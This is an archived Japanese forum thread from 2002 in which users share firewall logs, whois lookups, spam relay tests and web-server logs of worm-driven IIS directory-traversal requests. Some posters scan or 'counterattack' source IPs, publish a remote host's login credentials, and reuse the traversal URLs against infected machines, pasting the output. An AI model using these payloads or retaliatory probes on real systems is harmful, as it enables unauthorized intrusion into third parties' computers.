MAC : 00-d0-59-33-09-ec (AMBIT MICROSYSTEMS CORP.)
IP : 218.139.112.17

（´_ゝ`)

>350
ﾊｹﾞﾄﾞｰ

>>349
禿同

荒れちゃってますね。　こういう場合って誰かが次スレ
に結びつくようなテンプをあげなきゃね

もう>>1さんいないの？

通りすがるな

64.32.34.150,auth をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 64.32.34.150,auth
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 218.44.146.148,1427
ﾌﾟﾛｾｽ名は N/A
オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-30A [サブアロケーション] 218.44.146.0
有限会社デルタ・システム (DELTA SYSTEM CO.,LTD.)
DELTA [218.44.146.144 <-> 218.44.146.159] 218.44.146.144/28

>>356
偽fusianasanしないように。

またルータのログを消された。

何使ってんの?
どういうフィルタリングしてんの?

祝？SQLSpidaによる攻撃１００回突破〜（ｗ
っつ〜か、いい加減に駆除しる！

>>358
ちなみにルータの設定はデフォルトかい？

>>360
アタックしてくるアドレスは特定できてるの？
分かっていたら書き込みしてね。

未使用ポートって何？

銀行でいえば受付のお姉さんが座っていない窓口

>>361
360ではないが、アドレス特定できたら報復してくれるの？

68.39.15.198

何か知らないけれど、ポート6699を激しくつついてきます。
俺、MXなんて久しく起動してないのにな…。

The penetration method: Back stealth.!!
There was access which amounts
to no less than 367 times to 1433 ports.
The router permitted access to 1433 at 20:15.

port:1433_open(UDP) Time:20:15/
port:1433_close(TCP_UDP) Time:20:21/

202.206.112.24　　TCPポート:111

inetnum: 202.206.112.0 - 202.206.113.255
netname: SJZ2HS-CN
descr: ~{J/descr: Shijiazhuang No.2 Middle School
descr: Shijiazhuang,Hebei 050000,China
country: CN
admin-c: XL15-AP
tech-c: ZS10-AP
notify: [email protected]
changed: [email protected] 980330
source: APNIC

このIP62 で始まる奴、やたらしつこいんですが、、、

ハッカー検出ログ


--------------------------------------------------------------------------------

次の表には、ハッカーによる攻撃の疑いがある不正アクセスに関する情報が表示されます。


日付/時刻
攻撃方法
アクセス元
回数

2002/05/28
09:27:23 Port scan attempt 62.211.51.16 7
2002/05/28
06:25:06 Port scan attempt 62.211.248.208 9
2002/05/28
05:43:55 SCAN-SYN FIN scan 211.17.237.9 1
2002/05/27
23:52:31 Port scan attempt 195.232.57.6 2
2002/05/26
22:19:46 Port scan attempt 145.236.197.34 2
2002/05/26
18:29:49 SCAN-SYN FIN scan 62.70.6.138 1
2002/05/26
17:00:53 Port scan attempt 213.45.29.55 6
2002/05/25
23:00:34 SCAN-SYN FIN scan 62.70.6.138 3
2002/05/25
04:29:59 Port scan attempt 195.232.50.8 2
2002/05/23
11:39:47 Port scan attempt 62.211.248.68 7
2002/05/19
23:14:40 Port scan attempt 217.136.57.173 6
2002/05/19
03:05:00 Port scan attempt 62.211.192.226 17
2002/05/17
04:30:22 Port scan attempt 151.29.82.195 2
2002/05/16
23:04:05 Port scan attempt 62.211.249.94 13

2CHと61.194.43.6は関係あるの？

>>369
うちにもそのIPアドレス来ます。

61は頻繁に来るな。
あれはなんぞ?

>>369-371

http://pc.2ch.net/test/read.cgi/sec/1002776091/l50

よく見ておくように。

>>368
お前も読んでおけ。

■お客が来た
Date=2002/05/29 Time=21:17:06 IP=200.180.209.154 Port=22 (blocked by BlackICE)

■素性調査
nmap (V. 2.54BETA34)
-v -sS -F -P0 -O 200.180.209.154
Port State Service
21/tcp open ftp
23/tcp open telnet
79/tcp open finger
98/tcp open linuxconf
113/tcp open auth
513/tcp open login
514/tcp open shell
31337/tcp open Elite
Remote operating system guess: Linux 2.1.19 - 2.2.19
Uptime 1.997 days (since Mon May 27 20:30:48 2002)
TCP Sequence Prediction: Class=random positive increments
Difficulty=5525243 (Good luck!)
IPID Sequence Generation: Busy server or unknown class

ここからやたらアタックがくるわ・・・・
何考えてるんだろうね？

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 133.5.0.0
b. [ネットワーク名] KITE
f. [組織名] 九州大学
g. [Organization] Kyushu University
m. [運用責任者] SA031JP
n. [技術連絡担当者] YK1737JP
n. [技術連絡担当者] DI031JP
p. [ネームサーバ] ns.nc.kyushu-u.ac.jp
p. [ネームサーバ] nsb.nc.kyushu-u.ac.jp
y. [通知アドレス]
[割当年月日]
[返却年月日]
[最終更新] 1998/09/07 14:04:52 (JST)
[email protected]

昨日は日立からだよ。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.13.168.0
b. [ネットワーク名] HNB-NET
f. [組織名] 日立ネットビジネス株式会社
g. [Organization] Hitachi netBusiness, Ltd
m. [運用責任者] TI4440JP
n. [技術連絡担当者] TT5610JP
p. [ネームサーバ] ns1.hnb-yokohama1.com
p. [ネームサーバ] ns2.hnb-yokohama1.com
y. [通知アドレス] [email protected]
[割当年月日] 2001/04/23
[返却年月日]
[最終更新] 2001/04/23 13:11:45 (JST)
[email protected]

だから何が来たのか内容書けよ

＞３７７さん
すいません、やたらPing Attackが
来るんですよ。

>>377
もうだめぽ。このスレは捨てよう。

知らない人→216.17.89.136
がトロイおくってきますた。

US Internet Corp (NETBLK-USINET-BLK)
12450 Wayzata Boulavard12450
Minnatonka, MN 55305
US

Netname: USINET-BLK
Netblock: 216.17.0.0 - 216.17.95.255
Maintainer: USIC

Coordinator:
Lange, Kurt (KL476-ARIN) [email protected]
952-253-3200 (FAX) 952-545-0302

Domain System inverse mapping provided by:

NS.USINTERNET.COM 205.219.138.11
NS2.USINTERNET.COM 205.219.138.81

Record last updated on 28-Jun-2001.
Database last updated on 28-May-2002 23:38:30 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

まあ、「不正アクセス晒しコーナー」から発祥したスレなわけですから
いいんじゃないの。
ここ

>>380
それ、折れだ

トロイ送ってきたんじゃなくて
トロイの使うポートをスキャンしてきただけじゃないの？

210.145.***.**　port:1433
211.236.***.**　port:1433
211.121.***.**　port:1433
211.266.***.**　port:1433
61.87.***.**　port:1433
210.112.***.**　port:1433
218.233.***.**　port:1433
218.233.***.**　port:1433
182.189.***.**　port:1433
61.91.***.**　port:1433
210.227.***.**　port:1433
211.41.***.**　port:1433
207.242.***.**　port:1433
以下、200アクセスまでport:1433が続く。

久しぶりにログを覗いて見たらport:1433だらけでした。
MACアドレスでも記憶して追いかけて来てるんでしょうか？
>>379同意。もう捨てましょう。確かにレベルが落ちてる。。

>>384
ここ見れ
http://www.zdnet.co.jp/news/0111/26/e_sql.html

素人バンド宣伝のスパイウェア仕掛けている馬鹿がいたので晒し上げ！
下手な音楽が流れてうぜ〜〜〜

http://www.media501.com/ochichi/

ああ今日も1433うるさいのう

毎日こいつからアタックされます。
210.165.249.1
inetnum: 210.165.128.0 - 210.165.255.255
netname: INFOSPHERE
descr: InfoSphere (NTT PC Communications, Inc.)
country: JP
admin-c: HH1558JP
tech-c: RK448JP
tech-c: SO1352JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
changed: [email protected] 19980512
changed: [email protected] 20020529
source: JPNIC

いま>>388がこのスレにトドメをさしました

>>388
激しく脱力

ZSDX-8WQ31NORPD [61.175.176.242]
:80

Received:from210.103.141.136(HELO worldvision.or.kr) (210.103.141.136) by ** with SMTP
Received: from smtp0100.mail.yahoo.com [66.1.50.166] by mail.worldvision.or.kr (iMate Mail Server 4.6.0)
From:"Ronald Grove"< [email protected] >
To: [email protected] [email protected]
[email protected] [email protected] [email protected]
[email protected]
Subject: let her have it.
Message-ID: < [email protected] >
Return-Path: [email protected]

Received: from web14107.mail.yahoo.com (216.136.172.137) by ** with SMTP
Message-ID:< [email protected] >
Received: from [209.29.83.220] by web14107.mail.yahoo.com via HTTP
From:CecillaBethany< [email protected] >
Subject:Try this site and enjoy it.
To:
第三者中継可能!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
mail.worldvision.or.kr (pri=10)
問題あり：不正な中継を受け付けます。
(210.103.141.136)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

64.32.34.150,smtp をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 64.32.34.150,smtp
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 64.125.84.17,36046
ﾌﾟﾛｾｽ名は N/A

ファイヤーウォール系のソフトで、
相手を追跡する機能付きの物があるけど
あれはどこまでわかるものなんでしょう？

日付: 14/05/30 時刻: 20:50:15
規則「Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断」がxxx を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは xxx
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.51.184.198,1982
ﾌﾟﾛｾｽ名は N/A

このスレはFireWallが検出したIncidentを晒してスッキリしようという
趣向なのかな？

「　不　正　ア　ク　セ　ス　解　析　ス　レ　」　と　は　名　ば　か　り　の　ス　レ　で　す

Received:from www7b.dns.ne.jp (210.188.227.200) by **
Received: fromInf([211.130.64.163]) by www7b.dns.ne.jp (8.11.6/[SAKURA-VDv2]/20010410) with SMTP id ** for< [email protected] >
Date**
Message-Id:< [email protected] >
From:matsuzak< [email protected] >
To: [email protected] [email protected]
[email protected]
Subject: 馼峽蕾垂涙
211.130.64.163
オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-S76 [サブアロケーション]211.130.64.0
新和産業株式会社 (Shinwa-Sangyo Corporation)
SHINWA-NET [211.130.64.160 <-> 211.130.64.175]211.130.64.160/28
http://www.nkpf.co.jp/application/list/list.php3?area=5
http://www2.iis-inc.co.jp/address/hijo01.files/sheet029.htm
dns.ne.jp
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。

Received:from gero-onsen.net(EHLO GERO-ONSEN.NET) (210.166.136.168) by **
Received:fromUlbjn([211.130.64.163]) by GERO-ONSEN.NET (8.9.3) id **
Date**
Message-Id:< [email protected] >
From:reyukana< [email protected] >
To: [email protected] [email protected]
[email protected]
Subject:馼峽蕾垂涙
http://opt-out.offer888.net/?e=
http://i.mb00.net/remove?funnymoney
211.130.64.163
オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-S76 [サブアロケーション]211.130.64.0
新和産業株式会社 (Shinwa-Sangyo Corporation)
SHINWA-NET [211.130.64.160 <-> 211.130.64.175]211.130.64.160/28
http://www.nkpf.co.jp/application/list/list.php3?area=5
http://www2.iis-inc.co.jp/address/hijo01.files/sheet029.htm
210.166.136.168
a. [IPネットワークアドレス]210.166.136.0-210.166.138.0
b. [ネットワーク名]KK-NET
f. [組織名]有限会社 ケイアンドケイコーポレーション
http://www.kk-net.ne.jp/
g. [Organization] K and K Corporation Ltd.
p. [ネームサーバ] ns1.kk-net.ne.jp
p. [ネームサーバ] ns2.kk-ca.net
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
venus.kk-net.ne.jp (pri=30)
正常：中継は拒否されました。
http://www.gero-onsen.net/
gero-onsen.net (pri=10)
正常：中継は拒否されました。

Suspect TCP fragment.
eth0 PROTO=6 61.199.101.180:0 ○.○.○.○:0 L=40 S=0x00 I=0 F=0x0001 T=242 (#0)
Suspect TCP fragment.
eth0 PROTO=6 43.242.208.4:0 ○.○.○.○:0 L=40 S=0x00 I=0 F=0x0001 T=238 (#0)

これはどういったログなんでしょう？
最近多い・・・

211.220.55.186　何度もファイアーウォールされました
inetnum: 211.220.49.0 - 211.220.69.255
netname: KORNET-XDSL-PUSAN-KR
descr: PUSAN NODE
descr: 75 4KA JUNGANGDONG JUNGKU
descr: PUSAN
descr: 600-711
country: KR
admin-c: GP1325-KR
tech-c: WK4412-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020527
source: KRNIC

person: GilSoon Park
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: GP1325-KR
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020527
source: KRNIC

>>401
＞何度もファイアーウォールされました

日本語が使えない時点でアウト

IP: 210.165.238.181
DNS: pl437.nas923.o-tokyo.nttpc.ne.jp

さっきからトータル52回も何かしらやっている

ウザイ

>>403
何かしらってなんだよ？？
ping か？

ログすら読めない奴が増えたな

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.47.164.0-218.47.255.0
b. [ネットワーク名] PLALA
f. [組織名] 株式会社 ぷららネットワークス
g. [Organization] Plala Networks Inc.
m. [運用責任者] MN2905JP
n. [技術連絡担当者] HS3694JP
p. [ネームサーバ] dns1.plala.or.jp
p. [ネームサーバ] dns2.plala.or.jp
p. [ネームサーバ] ns-tk061.ocn.ad.jp
y. [通知アドレス]
[割当年月日] 2002/01/29
[返却年月日]
[最終更新] 2002/01/29 15:52:03 (JST)
[email protected]

こいつしつこい！１５分で１０回も…。

http://members.tripod.co.jp/ikuikuikuikuikuikuuu/ICE.jpg

風呂行ってきたら・・・　あんじゃこれ？　　　正常？　　

あのさあ、みんなダラダラと whois の情報垂れ流してるけどさあ、
それで不正アクセスの解析したつもりなの？？？
正直ウザイ

>>408
このスレはもうとっくに終わってる。
初質の回答こっちにまわして、早く終了させちまうか。

1433ポートへのアクセスって何をしようとしてるの？

終わらせるためだ、禿既だけど答えちゃおう。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_SQLSPIDA.B

>>409
このスレ放置に禿同。 それで、ちゃんとしたカキコフォーマットを>>1に
明記した新スレ立ててくれ。

ログをこんなとこにコピペして憂さ晴らしするのが精一杯で、
ウザイと言いながらどうしたらいいかわからん厨しか来ないだろう。

まあ解析できる人間でも、報復までやることは滅多になかろうし、
とするとストレスも溜まろうよ。
解析できない奴のストレスはもっとだろうし。

だから憂さ晴らしのスレでいいんじゃないか？
「皆様の心の健康のために」スレ、で。

>>408-413
FW導入して初めて「アタック」された時って俺は結構興奮したよ。
それを誰かに、できれば事情を解かってる誰かに聞いて欲しい
というふうに思って書き込むのは自然な成り行きだと思うがね。
そういうニーズがあって、このスレ（および前スレ）に厨な書き込
みがあるわけでしょう？　別にいいんじゃないのかなあこのままで。

>>415
俺はアタック喰らった最初の頃は、
人に話す前に自分でいろいろ調べたけどな。
自分で調べられなかったから人に聞いてるだけだろ。

不正アクセス「報告」スレならまだしも、いちおう「解析」スレだからなぁ・・・
多少なりとも意味のある情報を書いてもらいたいものだよ。

まあ、韓国・中国あたりの根本的な馬鹿が減らなければ
FW入れてもストレス溜まるだけかもしれないな。
メールチェックとかホームページちょろっと見るくらいしかPC使わないんだったら、
いっそのことFW外してしまうのも手かもしれない・・・

そ　れ　の　ど　こ　が　解　析　な　の　か　、　（略

>>417
それじゃあどこまでやれば君が満足できるのかを具体的に書きなよ

うんこした後のケツの穴を舐めて綺麗にしてくれたら

>>415
この板は厨房のニーズを満たすために存在するわけではない。

>>418
FWでポートふさいでいるものは解析の対象にはならない、FWのログは貼るな。
せめてポート開けてhttpのリクエストのログまでとれ。ただし、FWのログを統計的に解析したものは可。(曜日別、時間帯別等)
しかし、厨房には不可能。よって終了。

dns2.hichina.com (pri=20)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
btamail.com (pri=10)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
nihuyatut.net
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
jowisz.piotrkow.tpsa.pl (pri=10)
Relay test 7
>RSET
<250 Reset OK
>MAIL FROM:< [email protected] >
<250 < [email protected] > is syntactically correct
>RCPT TO:< relaytest%abuse.net@[213.77.170.80] >
<250 < relaytest%abuse.net@[213.77.170.80] > is syntactically correct

62.211.238.153 うざ

>>421

>>417

>>422

>>417

さっきポートスキャンしてきたから、反撃してやった（ｗ

IP:211.133.204.54

DNS:fjm0563.fjmcr3.thn.ne.jp

Wg:WORKGROUP
Node:JISAKU4
NetBIOS:PASYUMINA
MAC:004026F93EF1

ａｇｅ

嵐が来たんだがどうすればいいの？？↓
211.19.79.175

>>425

>>417

>>427

>>417

>>425
自分の厨ぶりをわざわざ書くとは、こんな馬鹿丸出しの自慢ばっかり

「反撃」ですか…

ﾜ

>>425
うっとり

2002/06/02 08:47:22 フォルダ丸見えの中国人が俺のPort139にアクセスしてきたよ。
-----------------------
IP: 210.75.240.50
Node: PXEFS
NetBIOS:
__MSBROWSE__

Group: SJF
MAC: 00D0B7B80390
-----------------------
Username=PXEFS/Password=PXEFSだったよ

ハッキングされるまえにしてまえぁぁぁぁぁ

┏━━━ / ｜━━━━━┓
　　　 ┗┳┳━ |＿| ━━━┳┳┛
　　　 　 ┃┃ ／　　ヽ 　　　 ┃┃
　　　 ┏┻┻ |======| ━━┻┻┓
　　　 ┗┳┳ ヽ__ ¶_ ノ ━━┳┳┛
　　　 　 ┃┃　（／）　　　　　┃┃
　　　 　 ┃┃　（／）　　　　　┃┃
　　　 凸┃┃　（／）　　　　　┃┃凸
　　　 Ш┃┃　（／）　　　　　┃┃Ш
　　　 .|| ┃┃　（／）　　　　　┃┃.||
　　∧＿∧　　 （／） ∧＿∧　　∧ ∧
　 （　・∀・）　　（／）（´∀｀　）　 (ﾟДﾟ ) 　今年こそ放置されませんように
　 （つ　　つミ　（／）（⊃⊂　）　⊂　 ⊃ 　　　
　　|＿|＿|＿�I（／）_|＿|＿|＿＿|　 |
　 ／／／／／ﾉ,,,,,,ヽ　／／／／||　 |〜
／／／／／／／／／／／／　 |∪∪
|￣￣￣￣￣￣￣￣￣￣￣|　　|
| 　 　　 　 奉　 納 　 　 　　 |

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.41.0.0-218.41.63.0
b. [ネットワーク名] SO-NET
f. [組織名] SO-Net サービス
g. [Organization] SO-Net Service
m. [運用責任者] MK2734JP
n. [技術連絡担当者] YY1426JP
n. [技術連絡担当者] SW314JP
p. [ネームサーバ] dnss3.so-net.ne.jp
p. [ネームサーバ] dnss4.so-net.ne.jp
p. [ネームサーバ] dnss5.so-net.ne.jp
p. [ネームサーバ] dnss6.so-net.ne.jp
p. [ネームサーバ] dnss7.so-net.ne.jp
p. [ネームサーバ] dnss8.so-net.ne.jp
p. [ネームサーバ] dnss9.so-net.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2001/10/25
[返却年月日]
[最終更新] 2001/10/25 16:22:11 (JST)
[email protected]

最近よく来る。

忘れてた。すいません。

ﾌｧｲｱｳｫｰﾙは 218.41.1.37 (TCP Port 1872) [TCP Flags: S]. から
このｺﾝﾋﾟｭｰﾀ (TCP Port 6699) への ｲﾝﾀｰﾈｯﾄ ｱｸｾｽをﾌﾞﾛｯｸしました。

日時: 2002/06/02 16:24:22

10分間で4回攻撃。
現在、迎撃中。

210.103.132.39 - - [02/Jun/2002:12:42:45 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:42:47 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:42:48 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:42:51 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:42:52 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:42:54 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:42:56 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:42:58 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 339 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:42:59 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:43:01 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:43:03 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:43:05 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:43:10 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
210.103.132.39 - - [02/Jun/2002:12:43:12 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
210.237.46.108 - - [02/Jun/2002:15:45:32 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
210.237.46.108 - - [02/Jun/2002:15:45:38 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
210.237.46.108 - - [02/Jun/2002:15:45:45 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
210.237.46.108 - - [02/Jun/2002:15:45:52 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
210.237.46.108 - - [02/Jun/2002:15:45:59 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"

>>440
それウィルスだよ。

○○○○○.ocn.ne.jpは自分のメルアドです。
こんなのが来ました。

The following mail can't be sent to ××××@××.com:

From: ○○○○○.ocn.ne.jp
To: ××××@××.com
Subject: (C) 2001 Yahoo Japan Corporation. All Rights
The file is the original mail

もう一通こんなのが
The following mail can't be sent to ○○○@hotmail.com:

From: ○○○○○.ocn.ne.jp
To: ○○○@hotmail.com
Subject: CELLPADDING
The file is the original mail

これなんすか？メルアド乗っ取られてだれかになにか送ってたってこと？

>>442
http://pc.2ch.net/test/read.cgi/sec/1021137509/l50

Win2kでApache使ってWebサーバ立ててるんだが、大半はおそらくNimdaかCodeRedと思われるログ。でも、よくわからんのもちらほらあるんだが、以下のは一体何しようとしてるんだろう。


210.187.156.169 - - [01/Jun/2002:15:47:13 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 307

62.211.187.183 - - [02/Jun/2002:12:11:17 +0900] "GET http://www.supereva.it/ HTTP/1.0" 200 590

213.213.10.185 - - [02/Jun/2002:00:16:08 +0900] "GET http://www.s3.com HTTP/1.1" 200 590

ゾーンアラームで全ての通信遮断したら、

The firewall has blocked Internet access to freeriders.at
(211.19.32.231) (HTTP) from your computer [TCP Flags: S].

こんなのが出たんだけど、これはここに何か送信してるってことなの？
三井情報開発株式会社ってとこのIPなんだけど。

>>444

漏れ串探しだろ

もう、駄目だこのスレ。>>397 の通りだな…

>>417 ばっかりだから、とっとと埋めちまえ！

>>440
http://210.103.132.39/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
http://210.237.46.108/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

Directory of C:\Inetpub\scripts

02-06-02 06:16p <DIR> .
02-06-02 06:16p <DIR> ..
02-06-02 06:17p 436,224 TFTP291
02-06-02 06:16p 253,440 TFTP355
02-06-02 06:17p 223,232 TFTP384
02-06-02 06:17p 100,352 TFTP581
6 File(s) 1,013,248 bytes
2,595,601,408 bytes free

Received:from 207.199.147.226 (EHLO logix-xchange.logixusa.com) (207.199.147.226) by ** with SMTP
Received:from smtp0422.mail.yahoo.com (210.52.27.5 [210.52.27.5]) by logix-xchange.logixusa.com with SMTP
(Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id **
Date**
From:"Marc Korshak"< [email protected] >
To: [email protected] [email protected] [email protected]
[email protected]
[email protected] [email protected]
Subject:Introducing HGH: The Most Powerful Anti-Obesity Drug Ever

Human Growth Hormone Therapy
Lose weight while building lean muscle mass
and reversing the ravages of aging all at once.
Remarkable discoveries about Human Growth Hormones (HGH)
are changing the way we think about aging and weight loss.

第三者中継可能!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
logix-xchange.logixusa.com (pri=100)
< 220 logix-xchange.logixusa.com ESMTP Server
(Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
> HELO rlytest.nanet.co.jp
< 250 OK
> MAIL FROM:< http://www.nanet.co.jp/rlytest/ [email protected] >
< 250 OK - mail from < http://www.nanet.co.jp/rlytest/ requested [email protected] >
> RCPT TO:<[email protected]>
< 250 OK - Recipient <[email protected]>
> QUIT
< 221 closing connection

問題あり：不正な中継を受け付けます。
(207.199.147.226)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

inetnum 210.52.27.0 - 210.52.39.255
netname DAQING-OIL
descr DaQing Oil field Network
descr No.66 Xibin Road, Daqing Sa District,
descr Heilongjiang Province
country CN

http://www.twin.ne.jp/~ackey/

210.52.27.5,ftp をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 210.52.27.5,ftp
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 80.14.240.202,4109
ﾌﾟﾛｾｽ名は N/A

>>448

>>417

>>449

>>417

>>451
>>417

>>430-433
ばか丸出し・・・

>>438
NetMeetingかなんかやったんじゃないか？

それとも、Sonetのやつが単にNetMeetingで前に使ったグローバルＩＰに接続しようとしているだけ。

>>449
おまえ、また来たのかよ・・・

だからSPAMの本文までダラダラコピペするんじゃねーってば！！！

>>442
メアドを乗っ取る・・・

自分のメアドを騙った迷惑メールが反乱しているのに、
まだメールヘッダの仕組みを知らない厨房がいるのか・・・

>>458
このスレ早く終わるなら何でもいいだろ。

とっとと埋め立てろ！こんな糞スレ

211.197.71.200 (IP Address)

Country:
KR
Host Master ([email protected])
11F, KTF B/D, 1321-11, Seocho2-Dong, Seocho-Gu,
Seoul, Korea, 137-857
Phone: +82-2-2186-4500
Fax: +82-2-2186-4496
Contact:
Hyunsun Choi ([email protected])
Phone: +82-2-747-9212
Fax: +82-2-747-5901

Received: from 211.148.131.18 (EHLO ficemail.fujikon.com.cn) (211.148.131.18) by **
Received: from smtp0136.mail.yahoo.com (218.25.133.9 [218.25.133.9]) by fic_email.fujikon.com.cn with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id **
Date**
From:"Tom Marcus"< [email protected] >
To: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
[email protected]
Subject:YourRequestedHGHInfo

As seen on NBC, CBS, and CNN, and even Oprah! The health
discovery that actually reverses aging while burning fat,
without dieting or exercise! This proven discovery has even
been reported on by the New England Journal of Medicine.
Forget aging and dieting forever! And it's Guaranteed!

http://www.chinaniconline.com/ultimatehgh/remove.php?userid=

第三者中継可能!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
mail.fujikon.com.cn (pri=10)
<220 fic_email.fujikon.com.cn ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2653.13) ready
>HELO rlytest.nanet.co.jp
<250 OK
>MAIL FROM:< http://www.nanet.co.jp/rlytest/ requested [email protected] >
<250 OK - mail from <http://www.nanet.co.jp/rlytest/ requested [email protected]>
>RCPT TO:<[email protected]>
<250 OK - Recipient <[email protected]>
>QUIT
<221 closing connection
問題あり：不正な中継を受け付けます。
(211.148.131.18)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

不正アクセスの種類Traceroute
不正アクセスの送信元61.124.180.165
調べたら
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.124.0.0-61.124.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] AI018JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/01/31
[返却年月日]
[最終更新] 2001/02/02 10:39:04 (JST)
[email protected]


でした。

アホンダラ！
Tracerouteがなんで不正アクセスなんじゃ！

ウィルスバスターのファイアウォールで引っかかったんで
てっきり不正アクセスかと・・・。

210.165.249.1
inetnum: 210.165.128.0 - 210.165.255.255
netname: INFOSPHERE
